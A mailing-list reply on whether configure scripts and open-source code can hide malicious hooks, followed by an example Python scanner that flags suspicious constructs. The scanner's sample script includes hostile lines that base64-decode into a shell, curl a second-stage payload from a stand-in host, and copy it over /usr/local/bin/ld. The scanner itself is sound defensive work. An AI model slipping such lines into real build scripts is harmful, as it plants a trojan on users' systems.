der Mouse wrote:
> The thing is, configure is an excellent place to hide a malicious
> grappling hook: it is frequently run by naïve installers, not
> uncommonly as root; by the nature of what it does, it is hard to
> sandbox (for example, it *must* be able to compile and run new
> programs); it is large and comparatively difficult to read over for
> human verification.
Isn't that also a major *potential* hazard of open-source in general though?
At least for the smaller projects with little peer review process, someone
could relatively easily slip a piece of malicious code into the source - sure
it'd get spotted and fixed pretty quickly, but it could still happen just as
easily (or not) as it could with a configure script.
It's a question I've asked myself before of OSS: how do I *know* it's going to
do what it says it's going to do? Unfortunately the answer seems to be that I
don't - but thankfully in my experience OSS contributors are a self-policing
lot, so in reality it doesn't happen.
i.e. if I download some code from your website, I either have to look through
it all and understand it, or I have to simply trust that your code does
exactly what you say it'll do - regardless of what procedure's used to build
it on my system.
cheers
Jules
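The thread's point is that a generated configure script is large, normally run with high privilege, and hard to read by hand. As an added example (not code from either poster or from any project), here is a small heuristic scanner of the kind a downloader could run before executing the script: it flags constructs a build-configuration script has little reason to contain, while leaving the legitimate compile-and-run probes alone. The rule list and the sample script are constructed for this illustration.

```python
"""Heuristic review of a generated configure script for constructs that a
build-configuration script has little reason to contain.  Added example,
not from any project; the rules and the sample script are constructed."""
import re
from typing import Dict, List, Tuple

# Each rule: (name, compiled pattern).  Kept narrow on purpose: plain `eval`
# and writes into the build directory are normal autoconf behaviour and are
# not flagged, so a compile-and-run probe (conftest) passes clean.
RULES = [
    ("network-fetch", re.compile(r"\b(curl|wget|fetch|nc|ncat)\b")),
    ("decoder", re.compile(r"\b(base64\s+(-d|--decode)|xxd\s+-r|uudecode)\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(sh|bash|ksh|zsh)\b")),
    ("system-path-write",
     re.compile(r"(\b(cp|mv|install|ln|chmod|chown|tee)\b.*\s|>\s*)"
                r"/(etc|usr|bin|sbin|lib|root|var)/")),
    ("privilege", re.compile(r"\bsudo\b|\bsu\s+-")),
]

Finding = Tuple[int, str, str]  # (line number, rule name, offending line)


def scan_configure(text: str) -> List[Finding]:
    """Return every (lineno, rule, line) hit, skipping blank and comment lines."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, pattern in RULES:
            if pattern.search(stripped):
                findings.append((lineno, name, stripped))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count hits per rule, for a quick verdict before a manual read."""
    counts: Dict[str, int] = {}
    for _, name, _ in findings:
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample: the first eleven lines mimic ordinary autoconf output
# (variable caching, eval of cache names, a conftest compile-and-run probe);
# the last three are the kind of grappling hook the thread is worried about.
SAMPLE_CONFIGURE = r"""#!/bin/sh
# Guess values for system-dependent variables.  (constructed sample)
ac_cv_header_stdio_h=yes
for ac_var in CC CFLAGS; do
  eval ac_val=\$$ac_var
done
# curl is only mentioned in this comment
cat <<EOF >conftest.c
int main(void){return 0;}
EOF
$CC -o conftest conftest.c && ./conftest
echo "aHR0cDovL2V4YW1wbGUuaW52YWxpZA==" | base64 -d | sh
curl -s http://example.invalid/stage2 -o /tmp/.s
cp /tmp/.s /usr/local/bin/ld
"""

if __name__ == "__main__":
    for lineno, rule, line in scan_configure(SAMPLE_CONFIGURE):
        print(f"line {lineno:3d}  {rule:18s}  {line}")
    print(summarize(scan_configure(SAMPLE_CONFIGURE)))
```

A clean result from this scanner is not proof of anything; it only narrows the part of a 10,000-line script that deserves a human read, which is the verification step Jules says the downloader is otherwise left to do in full.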